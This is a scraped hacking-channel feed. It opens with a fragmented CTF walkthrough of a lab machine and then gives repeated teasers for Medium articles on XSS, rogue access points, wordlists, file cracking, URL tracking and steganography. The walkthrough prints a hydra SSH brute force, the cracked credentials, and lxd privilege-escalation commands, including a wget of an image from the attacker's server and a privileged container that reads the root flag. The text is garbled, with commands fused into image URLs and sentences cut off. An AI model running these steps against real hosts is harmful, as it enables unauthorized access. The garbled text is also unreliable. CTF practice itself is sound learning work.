Hacking Articles Tips Tricks Videos Tutorials
Et8HFO_L73m-3Hlrfsirm6mGHgodJMq6kdbquTCas_3HX6ylII__nhO3j8i6h_ZJCTIqSpZRMMfPrlPCXWDggT5tIg=s16000 As a result, we run the wget command to download this word list to our machine.wget http://192.168.1.185/backup/wordlist.txthttps://blogger.googleusercontent…
an after port knocking to see what results we get. As you can see, the sshport has been opened.nmap -sV 192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEj4XJ8il2EhcF72wFhFketOyAtyYJDbwGmqFUyR-5wPOH3b4qu2f7W0XDWYvm_cKHxElmiz2qXLtLiUaj1eurO6B6RH7ylPby9gfRz9eAkdnshBsNjQ_XW38_i8uN_9UvjpCiEJVRH366AJVxd8P4_Z-3B3Da_sqwJ5KflFSgOxUAVbjdnS-aPfX_p0eg=s16000 ExploitationNow we're ready to attempt exploitation using the information we gained from previous outcomes, including a user name gained from source code. Let's try a brute force attack with the word list we stored for later.hydratool to begin a brute force attack. Bingo!! We have a username (jubiscleudo) and a password (onlymy).hydra -l jubiscleudo -P wordlist.txt 192.168.1.185 sshhttps://blogger.googleusercontent.com/img/a/AVvXsEgRiTvTej74I9DIgtAF81tYZ5f0SrrJgAerLXU4-SWzKPsuhoEW6-cqVdlHslGjRppt9DHGD_Mpkr1IfYs969Vw8eIdZ4PrmGvE3thomXDeWWh2KXYrbN5vDb4-y70C09ZVDjQPcztgrTvYi1NoKzRosqeJm-X6fIoBfmG1OsaA4hcwUzhvCbdAyRwk3w=s16000 Now let's use the credentials we received from the brute-force attack to log into ssh. Hurray!! The user jubiscleudowas successfully logged in. We instantly examined its id, then used the cat command to reveal the hidden user flag.ssh jubiscleudo@192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEjJw9wksN1n69ofidQ1f6ZtZz-Is2sGg0r5x7pl4hJxHTFFGm-vK7VCFZapsY-u7LhoCHeVqvUMMCq37SVk3zF0dw88qwZ76ZhqUDJjnqjBorSmdC8bqqtKBj00_gf77W_qPkg47icXFM3zc_zlwtgnIvixTh3Ysk8fDNtxfTptLWtxMfsLUZxpgkom4w=s16000 After all of this, we require another clue in order to get further into this machine. As a result, we employ the linpeas script to uncover some more buried data. More information about this script may be found here.Privilege EscalationLet's get this party started by changing the user to hackable_3. Then, after checking its user id, we discovered that it was potentially vulnerable to lxd. As a result, we can use lxd privilege escalationto gain root access.su hackable_3https://blogger.googleusercontent.com/img/a/AVvXsEjbosxw5QOudklWRdOZLYF7JmnxHjjiYn2qgjHgRuc5-Caaf2L-escvcbyDiNKmRhDwbV9KJ_Dhy_WIeIhJbrZP3yYIz64j5P5Y-S8_l2-wOeCZBjC1uQC7HIm_9lqkZPzBytQfLBQ3gK9lIJQJF7tGTSTdCEg-oka8KCXrALq9tMbtisWlVSHuoYOlkA=s16000 Privilege escalation via lxdnecessitates the use of a local account, which we already have. To escalate the root privileges of the host system, we must first generate an image for lxd, which requires the following steps:Steps must be taken on the host machine are as follows:● Take a look at the alpine image./root directory.reference of our article from here.git clone https://github.com/saghul/lxd-alpine-builder.gita simple python http serverto transfer this file to the victim's machine. On t[...]
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
an after port knocking to see what results we get. As you can see, the sshport has been opened.nmap -sV 192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEj4XJ8il2EhcF72wFhFketOyAtyYJDbwGmqFUyR-5wPOH3b4qu2f7W0XDWYvm_cKHxElmiz2qXLtLiUaj1eurO6B6…
he other hand, we will download the alpine-image to the victim machine's /tmpdirectory.wget 192.168.1.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gzAfter the image has been created, it may be added to LXDas an imageas follows:lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimageUse the list command to check the listof images.lxc image listhttps://blogger.googleusercontent.com/img/a/AVvXsEg4njfsqOVgdjRK4nlzgsUF9hcJ_ZHKn66CTJ34ujdtAQ6bvt1A3XIjV_7GzvlkqgSBa9EdGge0yMyPbn274fDuvKlecAB26wHXjUZOL5jx6Lu5UNSt13_qPmu6IIV1ufMI9ruJFzaL3Sg5YVdPzzBQQGXevxqixX5vwU4FNC14WMkSwrHV4XAwO5YFaw=s16000 We receive an error message stating that we do not have a storage pool. As a result, we must create one. We can use default settings in this case.lxd initAfter that, I proceeded as follows, continuing from the previous failed step.lxc init myimage ignite -c security.privileged=trueNavigate to /mnt/root to see all resources from the host machine once inside the container.cat root.txthttps://blogger.googleusercontent.com/img/a/AVvXsEgdJsfKy-vsLrCL5ZtCpwViXDPpGOwS0b_ADX5q_h9wWJUzRXb_yn0OVMcPEZ_bMuNGqX0NsW7R3C4NmAg06GpTrWK4N0lNzjXZwRx58vj7Ldilr8RNfp66kVpP1yuU_ARVFIXubZkST_zUrmbSiRRZvnZBpypHOVhZBaTFMe-pmf30vAm5iNxBS2myJQ=s16000 This was an excellent lab with a lot of information, particularly in the enumeration and privilege escalation sections. It is worthwhile to try to obtain some CTF experience. Hopefully, you guys will learn something new from this walkthrough.Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedInand Twitter.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB ÇÖZÜMLERİ
Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir…Continue reading on Medium »
Read more...
Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir…Continue reading on Medium »
Read more...
XYZ of XSS
Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would…Continue reading on Medium »
Read more...
Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would…Continue reading on Medium »
Read more...
KitPloit - PenTest Tools!
Dep-Scan - Fully Open-Source Security Audit For Project Dependencies Based On Known Vulnerabilities And Advisories. Supports Both Local Repos And Container Images. Integrates With Various CI Environments Such As Azure Pipelines, CircleCI, Google CloudBuild
___________________________
@hacking_Attack
@Hacking_Video
Dep-Scan - Fully Open-Source Security Audit For Project Dependencies Based On Known Vulnerabilities And Advisories. Supports Both Local Repos And Container Images. Integrates With Various CI Environments Such As Azure Pipelines, CircleCI, Google CloudBuild
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Dep-Scan - Fully Open-Source Security Audit For Project Dependencies Based On Known Vulnerabilities And Advisories. Supports Both…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
If you’re a large organization, hiring a Cyber security firm to audit your security posture is a…
https://cdn-images-1.medium.com/max/1036/0*HwwjpYWPxyH5Kv1X.png
These services really help keep you secure. You can never be 100% secure as there is always an amount of risk the business accepts, plus…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
If you’re a large organization, hiring a Cyber security firm to audit your security posture is a…
https://cdn-images-1.medium.com/max/1036/0*HwwjpYWPxyH5Kv1X.png
These services really help keep you secure. You can never be 100% secure as there is always an amount of risk the business accepts, plus…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Check How Exposed Are You On The Internet
These services really help keep you secure. You can never be 100% secure as there is always an amount of risk the business accepts, plus…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
In part one, I ended with the site Pipl and how you can search for yourself online.
https://cdn-images-1.medium.com/max/621/0*bMksVN944xZejONc.png
https://www.intelius.com/
https://www.beenverified.com/
https://www.spokeo.com/
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
In part one, I ended with the site Pipl and how you can search for yourself online.
https://cdn-images-1.medium.com/max/621/0*bMksVN944xZejONc.png
https://www.intelius.com/
https://www.beenverified.com/
https://www.spokeo.com/
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Check How Exposed You Are Online Part 2
https://www.intelius.com/ https://www.beenverified.com/ https://www.spokeo.com/
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Everyone is advertising free WiFi nowadays as a way to lure customers in.
https://cdn-images-1.medium.com/max/626/0*Ha3KL4sIfLVSUplT.jpg
You may think it would be super complex in order for these malicious parties to set this up but you would be wrong. Useful tools such as…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Everyone is advertising free WiFi nowadays as a way to lure customers in.
https://cdn-images-1.medium.com/max/626/0*Ha3KL4sIfLVSUplT.jpg
You may think it would be super complex in order for these malicious parties to set this up but you would be wrong. Useful tools such as…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Creating A Rogue Access Point
You may think it would be super complex in order for these malicious parties to set this up but you would be wrong. Useful tools such as…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Rockyou.txt will only get you so far.
https://cdn-images-1.medium.com/max/626/0*LrGls7YOr5Dsx0Tj.jpg
cupp and CeWL are tools that allow you to generate a wordlist based on the profile of the person or site that you are trying to hack.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Rockyou.txt will only get you so far.
https://cdn-images-1.medium.com/max/626/0*LrGls7YOr5Dsx0Tj.jpg
cupp and CeWL are tools that allow you to generate a wordlist based on the profile of the person or site that you are trying to hack.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Generating Custom Wordlists For Targeted Attacks
cupp and CeWL are tools that allow you to generate a wordlist based on the profile of the person or site that you are trying to hack.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cracking PDFs and ZIP files
https://cdn-images-1.medium.com/max/626/0*fbjNrI_HUk4xYkv8.jpg
Password protecting your files using a password is a great way to add additional security controls. The problem is, there are tools out…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cracking PDFs and ZIP files
https://cdn-images-1.medium.com/max/626/0*fbjNrI_HUk4xYkv8.jpg
Password protecting your files using a password is a great way to add additional security controls. The problem is, there are tools out…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cracking PDFs and ZIP files
Password protecting your files using a password is a great way to add additional security controls. The problem is, there are tools out…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Grabify is a service that can help you identify who is on the receiving end of your chats or emails.
https://cdn-images-1.medium.com/max/1360/0*MOpgqcLB3JHoJI_a.png
The link to the site is: https://grabify.link/
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Grabify is a service that can help you identify who is on the receiving end of your chats or emails.
https://cdn-images-1.medium.com/max/1360/0*MOpgqcLB3JHoJI_a.png
The link to the site is: https://grabify.link/
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Using Grabify To Track URLs
The link to the site is: https://grabify.link/
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Steganography is a way of hiding data in plain sight.
https://cdn-images-1.medium.com/max/600/0*bkTua1BjZTUXBVtE
This practice is commonly used to hide malware inside other files in order to get it onto a victim’s machine. The user would just see or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Steganography is a way of hiding data in plain sight.
https://cdn-images-1.medium.com/max/600/0*bkTua1BjZTUXBVtE
This practice is commonly used to hide malware inside other files in order to get it onto a victim’s machine. The user would just see or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Using Steganography To Hide Data In Plain Sight
This practice is commonly used to hide malware inside other files in order to get it onto a victim’s machine. The user would just see or…